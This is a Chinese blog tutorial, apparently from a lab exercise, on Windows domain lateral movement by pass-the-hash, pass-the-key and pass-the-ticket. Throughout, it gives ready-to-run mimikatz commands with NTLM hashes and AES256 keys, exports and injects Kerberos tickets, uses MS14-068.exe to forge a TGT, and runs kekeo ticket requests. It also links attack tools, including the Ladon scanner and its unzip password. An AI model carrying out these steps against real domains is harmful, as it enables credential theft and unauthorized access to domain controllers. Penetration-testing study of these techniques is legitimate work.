基础25-域横向PTH&PTK&PTT传递攻击

mxsillusion

​
基础25-域横向PTH&PTK&PTT传递攻击原创 M9 [url=]小白渗透成长之路[/url] 2022-02-12 15:25
收录于话题
#渗透基础32个
#域渗透5个

微信公众号：[小白渗透成长之路]
[如果你觉得文章对你有帮助，欢迎点赞????????]
迪哥YYDS

​

内容目录（由[TOC]自动生成）1.前期知识点案例1-域横向移动PTH传递-使用mimikatz实现案例2-域横向移动PTK传递-使用mimikatz实现案例3-域横向移动PTT传递-ms14068&kekeo&本地三种利用方式简介第一种利用漏洞：第二种利用工具—kekeo(不免杀)第三种利用本地票据(要管理权限)案例4-国产Ladon内网杀器
1.前期知识点PTH(pass the hash)    #利用 lm 或 ntlm 的值进行的渗透测试
PTT(pass the ticket)  #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key)     #利用的 ekeys aes256 进行的渗透测试
PTH 在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务，而不用提供明文密码。
如果禁用了ntlm认证，PsExec无法利用获得的 ntlm hash 进行远程连接，但是使用 mimikatz 还是可 以攻击成功。对于 8.1/2012r2，安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等，可以使用 AES keys 代替 NT hash 来实现 ptk 攻击,
PTH如果禁用ntml可以使用AES keys来替代NT hash来实现PTK攻击。
总结：KB2871997补丁后的影响
pth：没打补丁用户都可以连接，打了补丁只能administrator连接
ptk：打了补丁才能用户都可以连接，采用aes256连接
案例1、域横向移动PTH传递-使用mimikatz实现PTH ntlm 传递

       
• 
  

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
(域用户)

​

尝试连接域控。

​

​

连接成功。

       
• 
  

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
(连接工作组本地administrator用户)

​

尝试连接192.168.3.29

​

       
• 
  

sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
(连接工作组本地boss用户)

​

案例2、域横向移动PTK传递-使用mimikatz实现PTK aes256 传递
必须要打了补丁，才可以连接工作组及域：

       
• 
  

sekurlsa::ekeys #获取 aes

​

       
• 
  

sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

​

​

案例3、域横向移动PTT传递-ms14068&kekeo&本地三种利用方式简介
PTT攻击的部分就不是简单的NTLM认证，它是利用Kerberos协议攻击的，这里就介绍三种常见的攻击方法：MS14-068，Goldeb ticket，SILVER ticket，简单来说就是将合法的票据注入到内存中实现连接。
第一种利用漏洞：
能实现普通用户直接获取域控system权限
低权限，mimikatz是提权用不了的

​

第一步：获取本地SID值
正在上传…重新上传取消

记录下来。

第二步
利用 ms14-068 生成 TGT 数据 ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

       
• 
  

MS14-068.exe -u m91124\web -s S-1-5-21-2304571563-1307390793-3785167586-1108 -d 192.168.41.141 - p 990618@xh
MS14-068.exe下载地址：

       
• 
  

https://github.com/ianxtianxt/MS14-068
生成一个文件。

​

第三步:查当前计算机连接票据

​

命令：

       
• 
  

mimikatz # kerberos::purge
//清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造

​

​

第四步：
将我们伪造好的票据利用mimikatz导入到内存中去。
命令：

       
• 
  

mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
票据注入内存

​

导入成功后，再去查看一下当前主机凭据

​

发现新增了一个。
第五步：利用

       
• 
  

dir \192.168.3.21\c$
连接域控主机，如果ip不行，就换主机名连接。

​

原理：生成一个合法的连接请求，然后再使用mimikatz导入。相当于cookie伪造差不多。
第二种利用工具—kekeo(不免杀)
1.生成票据

       
• 
  

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

​

2.导入票据

       
• 
  

kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

​

3.查看凭据-klist命令是否成功

​

4.再利用net use载入即可，同上

       
• 
  

dir \192.168.3.21\c$
第三种利用本地票据(需要有管理员权限)
原理：利用之前连接过域控的缓存性文件

       
• 
  

sekurlsa::tickets /export
#导出之前的连接凭证(需要管理员权限)

       
• 
  

kerberos::ptt xxxxxxxxxx.xxxx.kirbi
#将之前和域控建立连接的凭据导入到内存中
相当于将之前管理员连接后台的cookie拿到手，然后我们再利用这个cookie去尝试连接后台。
注意：PTT凭据建立时间大致十小时。
案例4-国产Ladon内网杀器

       
• 
  

项目地址：https://github.com/k8gege/Ladon
解压密码：k8gege.org
图形化：

​

命令终端：

​

1.信息收集
扫描当前网段存活主机

​

2.检测网段内是否存在ms17010漏洞

​

使用指南笔记

​

等等等功能，可以自己下载下来研究研究

​

​